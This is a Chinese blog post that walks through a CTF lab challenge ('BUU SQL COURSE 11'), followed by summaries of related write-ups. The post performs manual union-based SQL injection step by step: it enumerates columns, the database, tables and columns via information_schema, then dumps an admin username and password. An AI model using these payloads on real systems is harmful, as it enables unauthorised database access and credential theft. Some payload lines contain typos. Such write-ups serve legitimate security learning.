BUU SQL COURSE 11 SQL注入

于 2024-07-11 22:40:08 发布
阅读量1.9k 收藏 39
点赞数 32
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80428402/article/details/140362560
版权

进入网站,发现是一个这样的网站,这里题目很明确提示了是SQL注入类型,于是就看它传递的参数包,如下

点击测试新闻1会弹出后缀pip?id=1的数据包

发现在点开第一个测试新闻发现传递的1数据包都存在SQL注入,于是修改参数执行SQL注入:

1、判断注入类型:

?id=1 or 1=1或者?id=1' or '1'='1

此处我输入(输入位置就在get'请求后面,看下面的图)

?id=1 or 1=1

表示数据库回显信息了,说明可以注入!

2、判断列数:?id=1 order by 1......这个命令需要一个一个试,直到没反应为止:

?id=1 order by 1

?id=1 order by 1,2

?id=1 order by 1,2,3

?id=1 order by 1,2,3,.. . ...

这道题试到3就没反应了,说明数据库有2个列

3、判断注入信息:?id=-1 union select1........

根据上面得出的结,需要注入2个数字来标记在哪里可以注入

?id=-1 union select 1,4

此处的1和4只是两个数字,用于标记位置,并非顺序

4、查看数据库:?id=-1 union select1,database()


输入:
?id=-1 union select 1, database()

title                   "3"

content          "news"

说明数据库名字叫news

5、查看表名:

?id=-1 union select 1,group_concat(table_name) from

information_schema.tables where table_schema=数据库名称输入

?id=-1 union select 1, group_concat(table_name) from information_schema.tables where table_schema= 'news'

回显:

title                         "1"

content                   " admin,contents"

说明有两个表:admin和contents

我们需要的是admin

6、查看列名:

?id=-1 union select 1,group concat(column_name) from information_schema.columns where table_name='表名'

输入

?id=-1 uaion select 1, group_concat(column_name) from informaton_schema.columns where tab1e_name='admin'

回显

title                      "1"       

content                "id,username,password"

发现有3个列: id,username,password

我们需要username和password这两个个列

无图

7、查看字段:


模板:
?id=-1 union select 1, group_concat(列名]from表名
此处我用到的为
输入
?id=-1 union select 1,group_concat(username) from admin


回显     得到有一个用户admin
title                        "1"
content                  "admin"

输入
?id=-1 union select 1,group_concat(password) from admin
数据库中存放着一个密码:
title                  "1"

content            "6ede396decdae7a523.c84d5f2f3.a4a1"

无图

最后一步:

                        登录

admin

6ede396decdae7a523.c84d5f2f3.a4a1

因为一些原因后面几步无图了

可以看一下大佬的视频

我的文字也是从中摘要

【BUUCTF BUU SQL COURSE 1 1 教程】 https://www.bilibili.com/video/BV1uN411m7HC/?share_source=copy_web&vd_source=47a2e64b7f52dd5d3d50305f94a3ba55

gogoguai
关注
BUUCTF[Web 1](SQL注入1)
夜思红尘的博客
06-22 345
这里是关于网络安全之SQL注入的练习,这里SQL是一个十分危险的漏洞,因此我们要注重有关于SQL注入的防御,同时欢迎大家前来阅读!
[初级]sql注入BUU SQL COURSE 1(爆库、表)
BlingZeng的博客
02-07 3836
这是一道选取自BUUCTF线上平台的sql注入题目,难度为初级。和大家一起学习分享
【CTF】BUU BURP COURSE 11
weixin_42515203的博客
06-24 412
BUU BURP COURSE 11,构造本地访问的header信息!
BUU SQL COURSE 11
WEB渗透测试 从入门到萌新
04-19 1345
打开之后 F12查看 http://7a0c2d1a-3ae3-4815-850d-9e229cef2e1f.node4.buuoj.cn:81/backend/content_detail.php?id=1 找到注入点 sql手工注入流程 1、判断注入类型 ?id=1 or 1=1 ?id=1' or '1'='1 2、判断列数:?id=1 order by 1,2,3 3、判断注入点:?id=-1 union select 1?id=-1 union select 1,2,3 ..
buu(sql注入)
qq_62046696的博客
08-23 1509
打开界面,我们发现是 admin账号还是monster,这道题肯定与cookie有关,直接在cookie中。列数不对,or也被过滤,大小写,双写都不能绕过,呃呃呃,这样order,information都被过滤了。回显位置,2,3现在我们需要找一个命令替换掉,information.schema_tables,这应该是注入点的位置, 发现# --+被过滤,然后是上传发现,没空格,那就有/**/代替空格。啥都没有,考察cookie用admin登录,都不需要密码,感觉挺离谱的,直接出来试一下monster,..
BUU sql注入-[极客大挑战 2019]LoveSQL
Ivyyyyyy1的博客
10-17 3043
一、题目 梅开二度属于是 直接操作 二、解题 1. 检测注入类型 我们用两个万能密码来检测 1 or 1=1# 1' or 1=1# 第一种万能密码对应检测的是数字型注入,第二种是字符型注入(因为字符通常用两个 ' 来标记,在1之后加 ' 构成闭合) 这里我们测试结果是用第二种万能密码登录成功,那么可以判断是字符型注入 2. 注入连招(查数爆库爆表爆列) 使用union select操作 1' order by 3# 1' order by...
SQL注入buu刷题记录)
姜小孩的博客
03-03 858
buu刷题者的笔记,感谢buu提供题,也感谢勤劳的自己
[Writeup]BUU SQL COURSE1[入门级]
小飒的博客
06-08 712
观察网址,好像找到注入点 获得数据库 ctftraining获得表名 FLAG_TABLE获得列名 FLAG_COLUMN获得数据时发现数据是空的,只能想另外办法 看能不能登录news的数据库下找到 admin的密码:67fef29ef7beb75f567587f135fa26a0 获得flag payload: 使用sqlmap burp里直接可以找到注入点...
BUU SQL COURSE
09-19
BUU SQL COURSE是一个SQL注入的实战演练平台。在这个平台上,你可以学习SQL注入的知识点,了解SQL注入的前置知识和一般测试步骤,并使用这些知识来解题。在注入过程中,一般需要找到注入点,闭合语句,带入语句进行...
BUU SQL COURSE 1
07-27
BUU SQL COURSE 1是一个关于SQL注入的课程。在这个课程中,学习者将学习如何通过注入恶意代码来绕过数据库的安全措施,从而获取敏感信息。课程内容包括找到注入点、闭合语句、带入语句进行爆破等技术。通过这些技术...
BUU SQL COURSE 2
最新发布
08-31
BUU SQL COURSE 2可能是针对SQL技能提升的课程,但具体内容无法得知,因为没有具体的信息提供。通常这类课程会覆盖SQL的高级知识点,比如事务处理、存储过程、触发器、高级查询技巧、性能优化、索引的使用等。学习这...
BUUCTF web SQL注入
m0_55854679的博客
08-09 2912
文章目录[极客大挑战 2019]EasySQL[强网杯 2019]随便注[SUCTF 2019]EasySQL[极客大挑战 2019]LoveSQL[极客大挑战 2019]BabySQL [极客大挑战 2019]EasySQL 根据题目,可以使用万能密码来尝试登陆。 [强网杯 2019]随便注 根据题目,可以想到此题目为sql注入,提交1与1’的结果如下 说明闭合方式为1’ 使用1‘ order by 查询字段数,得出为两列 1'; show tables;# 0'; show
buuctf sql注入
Rayae的博客
05-15 543
【强网杯】随便注 首先检查注入类型:字符注入 1' or 1=1 # 检查字段数 1' order by 2 # 1' order by 3 # # error 1054 : Unknown column '3' in 'order clause' # 报错,说明只有2个字段 查看数据库 1' union select 1, database() # 说明过滤了select、update等语句,试试堆叠注入: 1';show da...
sql注入合集-buuoj
~airrudder~
08-02 1115
文章目录[极客大挑战 2019]EasySQL[极客大挑战 2019]LoveSQL[极客大挑战 2019]BabySQL[极客大挑战 2019]HardSQL[极客大挑战 2019]FinalSQL[强网杯 2019]随便注[SUCTF 2019]EasySQL[CISCN2019 华北赛区 Day2 Web1]Hack World[GXYCTF2019]BabySQli[Black Watch 入群题]Web[网鼎杯 2018]Fakebook[网鼎杯2018]Unfinish[网鼎杯 2018]Com
sql的两种注入方式(“BUUCTF-N1BOOK”-[第一章 web入门]SQL注入-1)
m0_61851859的博客
02-04 229
通过解决具体题目(“BUUCTF-N1BOOK”-[第一章 web入门]SQL注入-1)在网站进行手工SQL注入和创建kali虚拟机环境来进行sqlmap自动注入两种注入方式来学习SQL注入工作原理,能够掌握简单的SQL注入方法。开始注入,用order by 判断列数。查找具体字段数据,得到flag。查找fl4g的列名。判断是否存在注入点。
BUUCTF】BUU SQL COURSE 1 1
qq_41369524的博客
12-10 1539
进到burp里面看:id=1,id=2。推断可能是根据SQL查询得到的不同界面结果。例如select * from 表名 where id=1;再试一次,发现原来是之前粘贴少了一个字母,成功拿到flag。试试3,试试2,发现2有回显,所以试探出该表有两列。看到了username和password。先审题,题目名字应该是关于SQL注入的。没有结果,考虑一下MD5解密,解不了。在界面随便点点,发现是POST。首先,判断其是字符型还是数字型。返回结果相同,所以是数字型。得到用户名是admin。
buuctf刷题8 (ssti注入&nmap- oG指令&别样的sql注入)
weixin_63231007的博客
10-15 1053
get_flashed_message()是通过flash()传入闪现信息列表的,能够把字符串对象表示的信息加入到一个消息列表,然后通过调用get_flashed_message()来取出。5.__get()中的p赋值为Modifier类,那么相当于Modifier类被当作函数处理,所以会触发Modifier类中的__invoke()魔术方法。继续看一下getSign函数。这样的语法构造还包括:echo,print,unset(),isset(),empty(),include,require,...
BUUCTF)BUU SQL COURSE 1
weixin_63442046的博客
04-28 2060
关于BUU SQL COURSE 1的思路
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值